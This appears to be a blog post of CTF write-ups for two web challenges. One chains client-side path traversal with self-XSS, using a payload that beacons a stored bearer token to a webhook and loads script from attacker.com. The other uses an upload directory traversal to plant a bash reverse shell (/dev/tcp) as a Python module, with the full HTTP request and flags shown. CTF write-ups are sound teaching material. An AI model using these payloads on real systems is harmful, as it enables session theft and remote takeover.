Bubble: ReRevenge
Vulnerability
- Client Side Path Traversal
e and t are controlled by Path parameters.
As shown in the picture above, we can manipulate the api requested path using path traversal.
- Self XSS
When writing a post, self-xss occurs in the preview function.
Chainning
Admin bot works as follows.
- Register
- add post with flag
- visit post
- write comment with post's author name
- back to dashboard, and write new post
In 4th steps, Client Side Path traversal vulnability also occurs.
So we can save draft with our username.
At this time, if our username contains XSS payloads, we can get xss when admin bot perform course 5.
Payload
- Change username to below payloadsaf.js ->
navigator.sendBeacon("https://webhook",localStorage.getItem("DiarrheaTokenBearerInLocalStorageForSecureRequestsContactAdminHeKnowsHotToUseWeHaveManyTokensHereSoThisOneShouldBeUnique"))
@[youtube srcdoc=<script/src=//attacker.com/af.js></script>]
- report url
https://bubble-tea-rerevenge.task.sasc.tf/post/USER_UUID/posts/506%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2f.%09.%2fapi%2fdrafts%2fsave%23
- get flag using admin session token
FLAG : kaspersky{6ruh_6um6l3_1s_n0_m0r3}
Peach Investor
Vulnerability
- File upload vuln
We can upload any file without restriction.
And, no validation exists for source parameter, we can upload files to any location by directory traversal.
Exploit
In docker container, I saw that the celery scheduler import a strange module (billiard).
We can use this to get shell.
If we create a directory called billiard, and upload __init__py
with a reverse shell in it, our code will run when the scheduler executed.
Payload
POST /upload?source=../billiard HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: en,ko;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 269
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Host: 409fe342-33f9-4f27-b317-398f174974ee.kit.sasc.tf
Origin: http://localhost:8000
Pragma: no-cache
Referer: http://localhost:8000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
------WebKitFormBoundaryBB3U3Fw3boGnqJKQ
Content-Disposition: form-data; name="file"; filename="__init__.py"
Content-Type: application/json
import os
os.system("/bin/bash -c 'bash -i > /dev/tcp/IP/1234 0>&1'")
------WebKitFormBoundaryBB3U3Fw3boGnqJKQ--
FLAG: kaspersky{p41d_w17h_c4sh_4nd_3nd3d_up_s0_s35h}
'ctf writeup' 카테고리의 다른 글
DiceCTF 2023 - unfinished (0) | 2023.02.06 |
---|---|
Balsn CTF 2022 2linenodejs writeup (0) | 2022.09.07 |
2022 Fall GoN Open Qual CTF writeup (2) | 2022.09.01 |
LINE CTF 2022 web writeup (0) | 2022.03.27 |
Codegate 2022 Preliminary writeup (0) | 2022.02.27 |